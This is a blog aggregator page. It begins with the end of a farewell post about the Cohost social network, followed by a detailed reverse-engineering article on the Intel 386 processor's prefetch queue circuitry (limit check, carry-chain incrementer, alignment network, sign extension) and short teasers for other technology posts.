instance, or what client to use, or even what "fediverse" means? This insurmountable barrier ensures that only specific people are taking part in the community, and excludes so many others. Bluesky is the worst of both worlds of being both technically decentralized while also very corporate. It's a desperate attempt to clone twitter as much as possible without stopping for even a moment to evaluate if that includes copying some of twitter's worst mistakes. Looking Forward When it became clear that I was going to walk away from my twitter account there was fear and anxiety. I knew that I would lose connections, some of which I had to work hard to build, but I had to stick to my morals. In the end, things turned out alright. I found a tight-nit community of friends in a private Discord server, found more time to focus on my hobbies and less on doomscrolling, and established this very blog. I know that even though I am very sad and very angry about Cohost, things will turn out alright. So long, Cohost, and thank you, Jae, Colin, Aiden, and Kara for trying. You are all an inspiration to not just desire a better world, but to go out and make an effort to build it. I'll miss you, eggbug.

8 months ago 15 votes

More in technology

Sierpiński triangle? In my bitwise AND?

Exploring a peculiar bit-twiddling hack at the intersection of 1980s geek sensibilities.

yesterday 4 votes
Reverse engineering the 386 processor's prefetch queue circuitry

In 1985, Intel introduced the groundbreaking 386 processor, the first 32-bit processor in the x86 architecture. To improve performance, the 386 has a 16-byte instruction prefetch queue. The purpose of the prefetch queue is to fetch instructions from memory before they are needed, so the processor usually doesn't need to wait on memory while executing instructions. Instruction prefetching takes advantage of times when the processor is "thinking" and the memory bus would otherwise be unused. In this article, I look at the 386's prefetch queue circuitry in detail. One interesting circuit is the incrementer, which adds 1 to a pointer to step through memory. This sounds easy enough, but the incrementer uses complicated circuitry for high performance. The prefetch queue uses a large network to shift bytes around so they are properly aligned. It also has a compact circuit to extend signed 8-bit and 16-bit numbers to 32 bits. There aren't any major discoveries in this post, but if you're interested in low-level circuits and dynamic logic, keep reading. The photo below shows the 386's shiny fingernail-sized silicon die under a microscope. Although it may look like an aerial view of a strangely-zoned city, the die photo reveals the functional blocks of the chip. The Prefetch Unit in the upper left is the relevant block. In this post, I'll discuss the prefetch queue circuitry (highlighted in red), skipping over the prefetch control circuitry to the right. The Prefetch Unit receives data from the Bus Interface Unit (upper right) that communicates with memory. The Instruction Decode Unit receives prefetched instructions from the Prefetch Unit, byte by byte, and decodes the opcodes for execution. This die photo of the 386 shows the location of the registers. Click this image (or any other) for a larger version. The left quarter of the chip consists of stripes of circuitry that appears much more orderly than the rest of the chip. This grid-like appearance arises because each functional block is constructed (for the most part) by repeating the same circuit 32 times, once for each bit, side by side. Vertical data lines run up and down, in groups of 32 bits, connecting the functional blocks. To make this work, each circuit must fit into the same width on the die; this layout constraint forces the circuit designers to develop a circuit that uses this width efficiently without exceeding the allowed width. The circuitry for the prefetch queue uses the same approach: each circuit is 66 µm wide1 and repeated 32 times. As will be seen, fitting the prefetch circuitry into this fixed width requires some layout tricks. What the prefetcher does The purpose of the prefetch unit is to speed up performance by reading instructions from memory before they are needed, so the processor won't need to wait to get instructions from memory. Prefetching takes advantage of times when the memory bus is otherwise idle, minimizing conflict with other instructions that are reading or writing data. In the 386, prefetched instructions are stored in a 16-byte queue, consisting of four 32-bit blocks.2 The diagram below zooms in on the prefetcher and shows its main components. You can see how the same circuit (in most cases) is repeated 32 times, forming vertical bands. At the top are 32 bus lines from the Bus Interface Unit. These lines provide the connection between the datapath and external memory, via the Bus Interface Unit. These lines form a triangular pattern as the 32 horizontal lines on the right branch off and form 32 vertical lines, one for each bit. Next are the fetch pointer and the limit register, with a circuit to check if the fetch pointer has reached the limit. Note that the two low-order bits (on the right) of the incrementer and limit check circuit are missing. At the bottom of the incrementer, you can see that some bit positions have a blob of circuitry missing from others, breaking the pattern of repeated blocks. The 16-byte prefetch queue is below the incrementer. Although this memory is the heart of the prefetcher, its circuitry takes up a relatively small area. A close-up of the prefetcher with the main blocks labeled. At the right, the prefetcher receives control signals. The bottom part of the prefetcher shifts data to align it as needed. A 32-bit value can be split across two 32-bit rows of the prefetch buffer. To handle this, the prefetcher includes a data shift network to shift and align its data. This network occupies a lot of space, but there is no active circuitry here: just a grid of horizontal and vertical wires. Finally, the sign extend circuitry converts a signed 8-bit or 16-bit value into a signed 16-bit or 32-bit value as needed. You can see that the sign extend circuitry is highly irregular, especially in the middle. A latch stores the output of the prefetch queue for use by the rest of the datapath. Limit check If you've written x86 programs, you probably know about the processor's Instruction Pointer (EIP) that holds the address of the next instruction to execute. As a program executes, the Instruction Pointer moves from instruction to instruction. However, it turns out that the Instruction Pointer doesn't actually exist! Instead, the 386 has an "Advance Instruction Fetch Pointer", which holds the address of the next instruction to fetch into the prefetch queue. But sometimes the processor needs to know the Instruction Pointer value, for instance, to determine the return address when calling a subroutine or to compute the destination address of a relative jump. So what happens? The processor gets the Advance Instruction Fetch Pointer address from the prefetch queue circuitry and subtracts the current length of the prefetch queue. The result is the address of the next instruction to execute, the desired Instruction Pointer value. The Advance Instruction Fetch Pointer—the address of the next instruction to prefetch—is stored in a register at the top of the prefetch queue circuitry. As instructions are prefetched, this pointer is incremented by the prefetch circuitry. (Since instructions are fetched 32 bits at a time, this pointer is incremented in steps of four and the bottom two bits are always 0.) But what keeps the prefetcher from prefetching too far and going outside the valid memory range? The x86 architecture infamously uses segments to define valid regions of memory. A segment has a start and end address (known as the base and limit) and memory is protected by blocking accesses outside the segment. The 386 has six active segments; the relevant one is the Code Segment that holds program instructions. Thus, the limit address of the Code Segment controls when the prefetcher must stop prefetching.3 The prefetch queue contains a circuit to stop prefetching when the fetch pointer reaches the limit of the Code Segment. In this section, I'll describe that circuit. Comparing two values may seem trivial, but the 386 uses a few tricks to make this fast. The basic idea is to use 30 XOR gates to compare the bits of the two registers. (Why 30 bits and not 32? Since 32 bits are fetched at a time, the bottom bits of the address are 00 and can be ignored.) If the two registers match, all the XOR values will be 0, but if they don't match, an XOR value will be 1. Conceptually, connecting the XORs to a 32-input OR gate will yield the desired result: 0 if all bits match and 1 if there is a mismatch. Unfortunately, building a 32-input OR gate using standard CMOS logic is impractical for electrical reasons, as well as inconveniently large to fit into the circuit. Instead, the 386 uses dynamic logic to implement a spread-out NOR gate with one transistor in each column of the prefetcher. The schematic below shows the implementation of one bit of the equality comparison. The mechanism is that if the two registers differ, the transistor on the right is turned on, pulling the equality bus low. This circuit is replicated 30 times, comparing all the bits: if there is any mismatch, the equality bus will be pulled low, but if all bits match, the bus remains high. The three gates on the left implement XNOR; this circuit may seem overly complicated, but it is a standard way of implementing XNOR. The NOR gate at the right blocks the comparison except during clock phase 2. (The importance of this will be explained below.) This circuit is repeated 30 times to compare the registers. The equality bus travels horizontally through the prefetcher, pulled low if any bits don't match. But what pulls the bus high? That's the job of the dynamic circuit below. Unlike regular static gates, dynamic logic is controlled by the processor's clock signals and depends on capacitance in the circuit to hold data. The 386 is controlled by a two-phase clock signal.4 In the first clock phase, the precharge transistor below turns on, pulling the equality bus high. In the second clock phase, the XOR circuits above are enabled, pulling the equality bus low if the two registers don't match. Meanwhile, the CMOS switch turns on in clock phase 2, passing the equality bus's value to the latch. The "keeper" circuit keeps the equality bus held high unless it is explicitly pulled low, to avoid the risk of the voltage on the equality bus slowly dissipating. The keeper uses a weak transistor to keep the bus high while inactive. But if the bus is pulled low, the keeper transistor is overpowered and turns off. This is the output circuit for the equality comparison. This circuit is located to the right of the prefetcher. This dynamic logic reduces power consumption and circuit size. Since the bus is charged and discharged during opposite clock phases, you avoid steady current through the transistors. (In contrast, an NMOS processor like the 8086 might use a pull-up on the bus. When the bus is pulled low, would you end up with current flowing through the pull-up and the pull-down transistors. This would increase power consumption, make the chip run hotter, and limit your clock speed.) The incrementer After each prefetch, the Advance Instruction Fetch Pointer must be incremented to hold the address of the next instruction to prefetch. Incrementing this pointer is the job of the incrementer. (Because each fetch is 32 bits, the pointer is incremented by 4 each time. But in the die photo, you can see a notch in the incrementer and limit check circuit where the circuitry for the bottom two bits has been omitted. Thus, the incrementer's circuitry increments its value by 1, so the pointer (with two zero bits appended) increases in steps of 4.) Building an incrementer circuit is straightforward, for example, you can use a chain of 30 half-adders. The problem is that incrementing a 30-bit value at high speed is difficult because of the carries from one position to the next. It's similar to calculating 99999999 + 1 in decimal; you need to tediously carry the 1, carry the 1, carry the 1, and so forth, through all the digits, resulting in a slow, sequential process. The incrementer uses a faster approach. First, it computes all the carries at high speed, almost in parallel. Then it computes each output bit in parallel from the carries—if there is a carry into a position, it toggles that bit. Computing the carries is straightforward in concept: if there is a block of 1 bits at the end of the value, all those bits will produce carries, but carrying is stopped by the rightmost 0 bit. For instance, incrementing binary 11011 results in 11100; there are carries from the last two bits, but the zero stops the carries. A circuit to implement this was developed at the University of Manchester in England way back in 1959, and is known as the Manchester carry chain. In the Manchester carry chain, you build a chain of switches, one for each data bit, as shown below. For a 1 bit, you close the switch, but for a 0 bit you open the switch. (The switches are implemented by transistors.) To compute the carries, you start by feeding in a carry signal at the right The signal will go through the closed switches until it hits an open switch, and then it will be blocked.5 The outputs along the chain give us the desired carry value at each position. Concept of the Manchester carry chain, 4 bits. Since the switches in the Manchester carry chain can all be set in parallel and the carry signal blasts through the switches at high speed, this circuit rapidly computes the carries we need. The carries then flip the associated bits (in parallel), giving us the result much faster than a straightforward adder. There are complications, of course, in the actual implementation. The carry signal in the carry chain is inverted, so a low signal propagates through the carry chain to indicate a carry. (It is faster to pull a signal low than high.) But something needs to make the line go high when necessary. As with the equality circuitry, the solution is dynamic logic. That is, the carry line is precharged high during one clock phase and then processing happens in the second clock phase, potentially pulling the line low. The next problem is that the carry signal weakens as it passes through multiple transistors and long lengths of wire. The solution is that each segment has a circuit to amplify the signal, using a clocked inverter and an asymmetrical inverter. Importantly, this amplifier is not in the carry chain path, so it doesn't slow down the signal through the chain. The Manchester carry chain circuit for a typical bit in the incrementer. The schematic above shows the implementation of the Manchester carry chain for a typical bit. The chain itself is at the bottom, with the transistor switch as before. During clock phase 1, the precharge transistor pulls this segment of the carry chain high. During clock phase 2, the signal on the chain goes through the "clocked inverter" at the right to produce the local carry signal. If there is a carry, the next bit is flipped by the XOR gate, producing the incremented output.6 The "keeper/amplifier" is an asymmetrical inverter that produces a strong low output but a weak high output. When there is no carry, its weak output keeps the carry chain pulled high. But as soon as a carry is detected, it strongly pulls the carry chain low to boost the carry signal. But this circuit still isn't enough for the desired performance. The incrementer uses a second carry technique in parallel: carry skip. The concept is to look at blocks of bits and allow the carry to jump over the entire block. The diagram below shows a simplified implementation of the carry skip circuit. Each block consists of 3 to 6 bits. If all the bits in a block are 1's, then the AND gate turns on the associated transistor in the carry skip line. This allows the carry skip signal to propagate (from left to right), a block at a time. When it reaches a block with a 0 bit, the corresponding transistor will be off, stopping the carry as in the Manchester carry chain. The AND gates all operate in parallel, so the transistors are rapidly turned on or off in parallel. Then, the carry skip signal passes through a small number of transistors, without going through any logic. (The carry skip signal is like an express train that skips most stations, while the Manchester carry chain is the local train to all the stations.) Like the Manchester carry chain, the implementation of carry skip needs precharge circuits on the lines, a keeper/amplifier, and clocked logic, but I'll skip the details. An abstracted and simplified carry-skip circuit. The block sizes don't match the 386's circuit. One interesting feature is the layout of the large AND gates. A 6-input AND gate is a large device, difficult to fit into one cell of the incrementer. The solution is that the gate is spread out across multiple cells. Specifically, the gate uses a standard CMOS NAND gate circuit with NMOS transistors in series and PMOS transistors in parallel. Each cell has an NMOS transistor and a PMOS transistor, and the chains are connected at the end to form the desired NAND gate. (Inverting the output produces the desired AND function.) This spread-out layout technique is unusual, but keeps each bit's circuitry approximately the same size. The incrementer circuitry was tricky to reverse engineer because of these techniques. In particular, most of the prefetcher consists of a single block of circuitry repeated 32 times, once for each bit. The incrementer, on the other hand, consists of four different blocks of circuitry, repeating in an irregular pattern. Specifically, one block starts a carry chain, a second block continues the carry chain, and a third block ends a carry chain. The block before the ending block is different (one large transistor to drive the last block), making four variants in total. This irregular pattern is visible in the earlier photo of the prefetcher. The alignment network The bottom part of the prefetcher rotates data to align it as needed. Unlike some processors, the x86 does not enforce aligned memory accesses. That is, a 32-bit value does not need to start on a 4-byte boundary in memory. As a result, a 32-bit value may be split across two 32-bit rows of the prefetch queue. Moreover, when the instruction decoder fetches one byte of an instruction, that byte may be at any position in the prefetch queue. To deal with these problems, the prefetcher includes an alignment network that can rotate bytes to output a byte, word, or four bytes with the alignment required by the rest of the processor. The diagram below shows part of this alignment network. Each bit exiting the prefetch queue (top) has four wires, for rotates of 24, 16, 8, or 0 bits. Each rotate wire is connected to one of the 32 horizontal bit lines. Finally, each horizontal bit line has an output tap, going to the datapath below. (The vertical lines are in the chip's lower M1 metal layer, while the horizontal lines are in the upper M2 metal layer. For this photo, I removed the M2 layer to show the underlying layer. Shadows of the original horizontal lines are still visible.) Part of the alignment network. The idea is that by selecting one set of vertical rotate lines, the 32-bit output from the prefetch queue will be rotated left by that amount. For instance, to rotate by 8, bits are sent down the "rotate 8" lines. Bit 0 from the prefetch queue will energize horizontal line 8, bit 1 will energize horizontal line 9, and so forth, with bit 31 wrapping around to horizontal line 7. Since horizontal bit line 8 is connected to output 8, the result is that bit 0 is output as bit 8, bit 1 is output as bit 9, and so forth. The four possibilities for aligning a 32-bit value. The four bytes above are shifted as specified to produce the desired output below. For the alignment process, one 32-bit output may be split across two 32-bit entries in the prefetch queue in four different ways, as shown above. These combinations are implemented by multiplexers and drivers. Two 32-bit multiplexers select the two relevant rows in the prefetch queue (blue and green above). Four 32-bit drivers are connected to the four sets of vertical lines, with one set of drivers activated to produce the desired shift. Each byte of each driver is wired to achieve the alignment shown above. For instance, the rotate-8 driver gets its top byte from the "green" multiplexer and the other three bytes from the "blue" multiplexer. The result is that the four bytes, split across two queue rows, are rotated to form an aligned 32-bit value. Sign extension The final circuit is sign extension. Suppose you want to add an 8-bit value to a 32-bit value. An unsigned 8-bit value can be extended to 32 bits by simply filling the upper bits with zeroes. But for a signed value, it's trickier. For instance, -1 is the eight-bit value 0xFF, but the 32-bit value is 0xFFFFFFFF. To convert an 8-bit signed value to 32 bits, the top 24 bits must be filled in with the top bit of the original value (which indicates the sign). In other words, for a positive value, the extra bits are filled with 0, but for a negative value, the extra bits are filled with 1. This process is called sign extension.9 In the 386, a circuit at the bottom of the prefetcher performs sign extension for values in instructions. This circuit supports extending an 8-bit value to 16 bits or 32 bits, as well as extending a 16-bit value to 32 bits. This circuit will extend a value with zeros or with the sign, depending on the instruction. The schematic below shows one bit of this sign extension circuit. It consists of a latch on the left and right, with a multiplexer in the middle. The latches are constructed with a standard 386 circuit using a CMOS switch (see footnote).7 The multiplexer selects one of three values: the bit value from the swap network, 0 for sign extension, or 1 for sign extension. The multiplexer is constructed from a CMOS switch if the bit value is selected and two transistors for the 0 or 1 values. This circuit is replicated 32 times, although the bottom byte only has the latches, not the multiplexer, as sign extension does not modify the bottom byte. The sign extend circuit associated with bits 31-8 from the prefetcher. The second part of the sign extension circuitry determines if the bits should be filled with 0 or 1 and sends the control signals to the circuit above. The gates on the left determine if the sign extension bit should be a 0 or a 1. For a 16-bit sign extension, this bit comes from bit 15 of the data, while for an 8-bit sign extension, the bit comes from bit 7. The four gates on the right generate the signals to sign extend each bit, producing separate signals for the bit range 31-16 and the range 15-8. This circuit determines which bits should be filled with 0 or 1. The layout of this circuit on the die is somewhat unusual. Most of the prefetcher circuitry consists of 32 identical columns, one for each bit.8 The circuitry above is implemented once, using about 16 gates (buffers and inverters are not shown above). Despite this, the circuitry above is crammed into bit positions 17 through 7, creating irregularities in the layout. Moreover, the implementation of the circuitry in silicon is unusual compared to the rest of the 386. Most of the 386's circuitry uses the two metal layers for interconnection, minimizing the use of polysilicon wiring. However, the circuit above also uses long stretches of polysilicon to connect the gates. Layout of the sign extension circuitry. This circuitry is at the bottom of the prefetch queue. The diagram above shows the irregular layout of the sign extension circuitry amid the regular datapath circuitry that is 32 bits wide. The sign extension circuitry is shown in green; this is the circuitry described at the top of this section, repeated for each bit 31-8. The circuitry for bits 15-8 has been shifted upward, perhaps to make room for the sign extension control circuitry, indicated in red. Note that the layout of the control circuitry is completely irregular, since there is one copy of the circuitry and it has no internal structure. One consequence of this layout is the wasted space to the left and right of this circuitry block, the tan regions with no circuitry except vertical metal lines passing through. At the far right, a block of circuitry to control the latches has been wedged under bit 0. Intel's designers go to great effort to minimize the size of the processor die since a smaller die saves substantial money. This layout must have been the most efficient they could manage, but I find it aesthetically displeasing compared to the regularity of the rest of the datapath. How instructions flow through the chip Instructions follow a tortuous path through the 386 chip. First, the Bus Interface Unit in the upper right corner reads instructions from memory and sends them over a 32-bit bus (blue) to the prefetch unit. The prefetch unit stores the instructions in the 16-byte prefetch queue. Instructions follow a twisting path to and from the prefetch queue. How is an instruction executed from the prefetch queue? It turns out that there are two distinct paths. Suppose you're executing an instruction to add 12345678 to the EAX register. The prefetch queue will hold the five bytes 05 (the opcode), 78, 56, 34, and 12. The prefetch queue provides opcodes to the decoder one byte at a time over the 8-bit bus shown in red. The bus takes the lowest 8 bits from the prefetch queue's alignment network and sends this byte to a buffer (the small square at the head of the red arrow). From there, the opcode travels to the instruction decoder.10 The instruction decoder, in turn, uses large tables (PLAs) to convert the x86 instruction into a 111-bit internal format with 19 different fields.11 The data bytes of an instruction, on the other hand, go from the prefetch queue to the ALU (Arithmetic Logic Unit) through a 32-bit data bus (orange). Unlike the previous buses, this data bus is spread out, with one wire through each column of the datapath. This bus extends through the entire datapath so values can also be stored into registers. For instance, the MOV (move) instruction can store a value from an instruction (an "immediate" value) into a register. Conclusions The 386's prefetch queue contains about 7400 transistors, more than an Intel 8080 processor. (And this is just the queue itself; I'm ignoring the prefetch control logic.) This illustrates the rapid advance of processor technology: part of one functional unit in the 386 contains more transistors than an entire 8080 processor from 11 years earlier. And this unit is less than 3% of the entire 386 processor. Every time I look at an x86 circuit, I see the complexity required to support backward compatibility, and I gain more understanding of why RISC became popular. The prefetcher is no exception. Much of the complexity is due to the 386's support for unaligned memory accesses, requiring a byte shift network to move bytes into 32-bit alignment. Moreover, at the other end of the instruction bus is the complicated instruction decoder that decodes intricate x86 instructions. Decoding RISC instructions is much easier. In any case, I hope you've found this look at the prefetch circuitry interesting. I plan to write more about the 386, so follow me on Bluesky (@righto.com) or RSS for updates. I've written multiple articles on the 386 previously; a good place to start might be my survey of the 368 dies. Footnotes and references The width of the circuitry for one bit changes a few times: while the prefetch queue and segment descriptor cache use a circuit that is 66 µm wide, the datapath circuitry is a bit tighter at 60 µm. The barrel shifter is even narrower at 54.5 µm per bit. Connecting circuits with different widths wastes space, since the wiring to connect the bits requires horizontal segments to adjust the spacing. But it also wastes space to use widths that are wider than needed. Thus, changes in the spacing are rare, where the tradeoffs make it worthwhile. ↩ The Intel 8086 processor had a six-byte prefetch queue, while the Intel 8088 (used in the original IBM PC) had a prefetch queue of just four bytes. In comparison, the 16-byte queue of the 386 seems luxurious. (Some 386 processors, however, are said to only use 12 bytes due to a bug.) The prefetch queue assumes instructions are executed in linear order, so it doesn't help with branches or loops. If the processor encounters a branch, the prefetch queue is discarded. (In contrast, a modern cache will work even if execution jumps around.) Moreover, the prefetch queue doesn't handle self-modifying code. (It used to be common for code to change itself while executing to squeeze out extra performance.) By loading code into the prefetch queue and then modifying instructions, you could determine the size of the prefetch queue: if the old instruction was executed, it must be in the prefetch queue, but if the modified instruction was executed, it must be outside the prefetch queue. Starting with the Pentium Pro, x86 processors flush the prefetch queue if a write modifies a prefetched instruction. ↩ The prefetch unit generates "linear" addresses that must be translated to physical addresses by the paging unit (ref). ↩ I don't know which phase of the clock is phase 1 and which is phase 2, so I've assigned the numbers arbitrarily. The 386 creates four clock signals internally from a clock input CLK2 that runs at twice the processor's clock speed. The 386 generates a two-phase clock with non-overlapping phases. That is, there is a small gap between when the first phase is high and when the second phase is high. The 386's circuitry is controlled by the clock, with alternate blocks controlled by alternate phases. Since the clock phases don't overlap, this ensures that logic blocks are activated in sequence, allowing the orderly flow of data. But because the 386 uses CMOS, it also needs active-low clocks for the PMOS transistors. You might think that you could simply use the phase 1 clock as the active-low phase 2 clock and vice versa. The problem is that these clock phases overlap when used as active-low; there are times when both clock signals are low. Thus, the two clock phases must be explicitly inverted to produce the two active-low clock phases. I described the 386's clock generation circuitry in detail in this article. ↩ The Manchester carry chain is typically used in an adder, which makes it more complicated than shown here. In particular, a new carry can be generated when two 1 bits are added. Since we're looking at an incrementer, this case can be ignored. The Manchester carry chain was first described in Parallel addition in digital computers: a new fast ‘carry’ circuit. It was developed at the University of Manchester in 1959 and used in the Atlas supercomputer. ↩ For some reason, the incrementer uses a completely different XOR circuit from the comparator, built from a multiplexer instead of logic. In the circuit below, the two CMOS switches form a multiplexer: if the first input is 1, the top switch turns on, while if the first input is a 0, the bottom switch turns on. Thus, if the first input is a 1, the second input passes through and then is inverted to form the output. But if the first input is a 0, the second input is inverted before the switch and then is inverted again to form the output. Thus, the second input is inverted if the first input is 1, which is a description of XOR. The implementation of an XOR gate in the incrementer. I don't see any clear reason why two different XOR circuits were used in different parts of the prefetcher. Perhaps the available space for the layout made a difference. Or maybe the different circuits have different timing or output current characteristics. Or it could just be the personal preference of the designers. ↩ The latch circuit is based on a CMOS switch (or transmission gate) and a weak inverter. Normally, the inverter loop holds the bit. However, if the CMOS switch is enabled, its output overpowers the signal from the weak inverter, forcing the inverter loop into the desired state. The CMOS switch consists of an NMOS transistor and a PMOS transistor in parallel. By setting the top control input high and the bottom control input low, both transistors turn on, allowing the signal to pass through the switch. Conversely, by setting the top input low and the bottom input high, both transistors turn off, blocking the signal. CMOS switches are used extensively in the 386, to form multiplexers, create latches, and implement XOR. ↩ Most of the 386's control circuitry is to the right of the datapath, rather than awkwardly wedged into the datapath. So why is this circuit different? My hypothesis is that since the circuit needs the values of bit 15 and bit 7, it made sense to put the circuitry next to bits 15 and 7; if this control circuitry were off to the right, long wires would need to run from bits 15 and 7 to the circuitry. ↩ In case this post is getting tedious, I'll provide a lighter footnote on sign extension. The obvious mnemonic for a sign extension instruction is SEX, but that mnemonic was too risque for Intel. The Motorola 6809 processor (1978) used this mnemonic, as did the related 68HC12 microcontroller (1996). However, Steve Morse, architect of the 8086, stated that the sign extension instructions on the 8086 were initially named SEX but were renamed before release to the more conservative CBW and CWD (Convert Byte to Word and Convert Word to Double word). The DEC PDP-11 was a bit contradictory. It has a sign extend instruction with the mnemonic SXT; the Jargon File claims that DEC engineers almost got SEX as the assembler mnemonic, but marketing forced the change. On the other hand, SEX was the official abbreviation for Sign Extend (see PDP-11 Conventions Manual, PDP-11 Paper Tape Software Handbook) and SEX was used in the microcode for sign extend. RCA's CDP1802 processor (1976) may have been the first with a SEX instruction, using the mnemonic SEX for the unrelated Set X instruction. See also this Retrocomputing Stack Exchange page. ↩ It seems inconvenient to send instructions all the way across the chip from the Bus Interface Unit to the prefetch queue and then back across to the chip to the instruction decoder, which is next to the Bus Interface Unit. But this was probably the best alternative for the layout, since you can't put everything close to everything. The 32-bit datapath circuitry is on the left, organized into 32 columns. It would be nice to put the Bus Interface Unit other there too, but there isn't room, so you end up with the wide 32-bit data bus going across the chip. Sending instruction bytes across the chip is less of an impact, since the instruction bus is just 8 bits wide. ↩ See "Performance Optimizations of the 80386", Slager, Oct 1986, in Proceedings of ICCD, pages 165-168. ↩

yesterday 4 votes
Code Matters

It looks like the code that the newly announced Figma Sites is producing isn’t the best. There are some cool Figma-to-WordPress workflows; I hope Sites gets more people exploring those options.

2 days ago 5 votes
What got you here…

John Siracusa: Apple Turnover From virtue comes money, and all other good things. This idea rings in my head whenever I think about Apple. It’s the most succinct explanation of what pulled Apple from the brink of bankruptcy in the 1990s to its astronomical success today. Don’

2 days ago 3 votes
A single RGB camera turns your palm into a keyboard for mixed reality interaction

Interactions in mixed reality are a challenge. Nobody wants to hold bulky controllers and type by clicking on big virtual keys one at a time. But people also don’t want to carry around dedicated physical keyboard devices just to type every now and then. That’s why a team of computer scientists from China’s Tsinghua University […] The post A single RGB camera turns your palm into a keyboard for mixed reality interaction appeared first on Arduino Blog.

2 days ago 3 votes